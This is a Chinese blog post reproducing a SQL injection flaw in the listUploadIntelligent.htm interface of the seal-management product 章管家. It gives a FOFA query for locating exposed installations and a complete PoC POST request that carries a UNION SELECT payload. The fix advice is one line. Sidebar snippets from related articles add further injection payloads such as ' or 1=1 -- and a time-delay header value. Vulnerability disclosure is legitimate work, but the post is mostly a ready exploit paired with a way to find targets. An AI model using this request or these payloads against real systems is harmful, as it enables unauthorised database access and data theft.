X管家listUploadIntelligent.htm接口存在sql注入

已于 2024-09-06 09:26:40 修改
阅读量294 收藏 2
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-09-06 09:24:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/141950582
版权

1 产品简介

章管家是一款集智能印章管理系统、APP、智能终端设备于一体的印章智慧管理解决方案,由上海建业信息科技股份有限公司推出。该产品旨在通过智能化手段,解决企业实体印章使用与管理的难点与痛点,提升印章管理的安全性和效率,为企业印章管理提供了强有力的支持。

2 漏洞概述

X管家listUploadIntelligent.htm接口存在sql注入

3 复现环境

FOFA:

body="章管家登录-公章在外防私盖"

4 漏洞复现

poc

漏洞链接:http://xxx.xx.xxx.xx/app/message/listUploadIntelligent.htm?token=dingtalk_token 

POST /app/message/listUploadIntelligent.htm?token=dingtalk_token HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xxx
Content-Length: 89
Content-Type: application/x-www-form-urlencoded

person_id=1&unit_id=1&pageNo=1&is_read=-1 union select user(),2,3,4,5,6,7,8,9,10,11,12 --

5 修复建议

关闭互联网暴露免或接口设置访问权限

天官赐福万无禁忌
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入详解
越努力 越自由
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入
热门推荐
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入(SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
url存在链接注入漏洞_检测到目标URL存在SQL注入漏洞
weixin_29458415的博客
01-13 2502
解决办法防护建议包括部署分层安全措施(包括在接受用户输入时使用参数化的查询)、确保应用程序仅使用预期的数据、加固数据库服务器防止不恰当的访问数据。建议使用以下措施防范SQL注入漏洞:对于开发========使用以下建议编写不受SQL注入***影响的web应用。参数化查询:SQL注入源于***者控制查询数据以修改查询逻辑,因此防范SQL注入***的最佳方式就是将查询的逻辑与其数据分隔,这可以防止执行...
SQL注入工具类
点点的博客
06-26 6298
import cn.hutool.crypto.SecureUtil; import lombok.extern.slf4j.Slf4j; import javax.servlet.http.HttpServletRequest; import java.util.regex.Matcher; import java.util.regex.Pattern; /** * sql注入处理工具类 */ @Slf4j public class SqlInjectionUtil { /** *
利用X-Forwarded-For进行sql注入
wqj975005563的专栏
06-06 4520
由于系统一般会采用String ip = request.getHeader("X-Forwarded-For");进行获取ip,然后注入者就可以通过X-Forwarded-For请求头信息就行伪造ip,当然了这个ip也可以是一些注入语句,如下X-Forwarded-For:payload';WAITFOR DELAY '0:0:5'--String sql = "select * from ta...
SQL注入案例演示与防范措施大全
乱世刀疤
02-26 1万+
SQL注入攻击案例与应对措施。
SQL注入之Mssql注入
qq_57307348的博客
02-16 5473
sql注入之mssql注入基础
mybatis如何防止SQL注入
m0_61802230的博客
05-17 8479
sql注入发生的时间,sql注入发生的阶段在sql预编译阶段,当编译完成的sql不会产生sql注入 一、采用jdbc操作数据时候 String sql = "update ft_proposal set id = "+id; PreparedStatement prepareStatement = conn.prepareStatement(sql); prepareStatement.executeUpdate(); preparedStatement 预编译对象会对传入sql进行预编译,那么当传入.
浅谈SQL注入漏洞原理及利用方式
weixin_62369433的博客
11-15 2454
帮助读者快速理解SQL注入漏洞,更好的做出修复
SQL注入漏洞详解
无言道的博客
03-13 1万+
文章目录SQL注入漏洞原理SQL注入内容注入条件判断注入SQL注释符与注入流程 SQL注入漏洞原理 漏洞原理   web页面源代码对用户提交的参数没有做出任何过滤限制,直接扔到SQL语句中去执行,导致特殊字符改变了SQL语句原来的功能和逻辑。黑客利用此漏洞执行恶意的SQL语句,如查询数据、下载数据,写webshell、执行系统命令以此来绕过登录权限限制等。 检测方法   可以利用sqlmap进行SQL注入的检查或利用,也可以使用其他SQL注入工具。也可以手工测,利用单引号、and 1=1以及字符型
管家 listUploadIntelligent.htm SQL注入漏洞复现
0xSec
08-11 343
管家 listUploadIntelligent.htm接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
记一次api接口SQL注入实战
m0_65247093的博客
04-30 3328
目录 0x01 思路:google hacking语法asmx?wsdl 0x02 发现两个接口 并且能够异地调用 0x03 抓包repeat判断 0x04 暴库 指导 某迪导师 0x01 思路:google hacking语法asmx?wsdl 点击url:domain/WebServices/InboxWS.asmx 0x02 发现两个接口 并且能够异地调用 火狐中抓包 测试 0x03 抓包repeat判断 四个参数加 ' 报nynax错误 由此推断可能存..
ThinkPHP3.2.X SQL注入漏洞的解决方案
amaoatao的博客
03-09 3533
程序部分 1.入口文件加入SQL关键字过滤(立刻要做), API的有多维数据的需要注意 2.任何密码要有等级检测, 密码位数提高到8位以上 3.纯数字的支付密码也要有安全检测, 如’123456’的密码将不能通过 4.登录/支付密码连续错误5次账号暂停24小时(后台参数可设置) 5.密码要先在本地加密(SHA1) 6.涉及API接口对接的项目全部使用AES加密(每个项目最好使用不同的密...
如何防止sql注入?防止sql注入方法介绍
小小博客爱分享
08-18 7375
一、什么叫SQL注入攻击?sql注入简介 SQL注入是较为普遍的互联网攻击方法,它并不是通过电脑操作系统的BUG来完成攻击,而是对于程序编写时的疏漏,利用SQL语句,达到无帐号登录,乃至改动数据库的目的。 SQL注入产生的原因便是:没经查验或是未充分检验的输入数据,出现意外变成了sql代码而被执行。对于SQL注入,则是递交的数据,被数据库系统编译而造成了开发人员预估以外的问题。也就是说,SQL注入是用户的输入信息,在连接SQL语句的过程中,跨越了数据本身,变成了SQL语句逻辑的一部分,随后被拼凑的SQL
红帆OA udfmr.asmx SQL注入漏洞复现
0xSec
08-18 3801
红帆iOffice.netudfmr.asmx接口存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
【数据隐私与安全】数据隐私保护与安全管理
weixin_39372311的博客
09-01 948
数据隐私与安全已成为当今社会不可忽视的重要问题。企业需要在遵守法律法规的基础上,采取有效的技术和管理措施,确保数据的安全与隐私不受侵犯。在未来,随着安全技术的不断发展,数据隐私保护将会更加完善,为企业和个人的数据资产保驾护航。
浅谈网络安全的认识与学习规划
最新发布
qq_201729558
09-05 307
本文主要介绍网络安全认识与学习规划
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 184
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
【一嗨租车-注册安全分析报告-滑动验证加载不正常导致安全隐患】
09-02 1094
一嗨租车创立于2006年1月,主要为个人和政企用户提供综合汽车出行服务,一嗨租车于北京时间2014年11月18日晚9点45分,正式登陆美国纽交所挂牌交易, 作为美股上市公司,拥有雄厚的技术实力,但采用的是通俗的滑动验证产品,并且不能正常加载导致安全隐患。即使问题解决,其安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全
如何对接口进行sql注入测试
01-22
接口进行SQL注入测试是一种常见的安全测试方法,旨在检测接口是否存在SQL注入漏洞,以及验证接口对于恶意输入的处理能力。下面是如何对接口进行SQL注入测试的步骤: 1. 确定目标接口:首先需要确定要测试的目标接口,可以是一个网站的登录接口、注册接口或者其他与数据库交互的接口。 2. 构造SQL注入语句:根据目标接口的输入参数,针对不同的参数类型(字符串、数字等),构造不同的SQL注入语句。例如,在登录接口中,如果用户名参数是一个字符串,可以尝试使用单引号进行注入,如`' or 1=1 -- `。 3. 发送注入请求:使用工具或编写脚本发送构造好的注入请求到目标接口,观察接口的返回结果。如果返回结果与正常情况不同,可能存在注入漏洞。 4. 分析注入结果:根据接口返回的结果,分析是否成功注入,并获取敏感信息。例如,在登录接口中,如果成功注入可以登录为其他用户,则存在注入漏洞。 5. 进行进一步测试:如果成功注入,可以尝试进一步利用注入漏洞,例如获取数据库信息、执行一些恶意操作等。 6. 提供修复建议:在完成测试后,应向开发人员提供修复建议,包括验证输入参数、使用参数化查询等措施,以预防SQL注入攻击。 总之,对接口进行SQL注入测试需要仔细构造注入语句并发送请求,然后分析结果。然而,测试前需要获得授权,只能在合法的环境中进行,遵守法律和道德规范,以保护系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值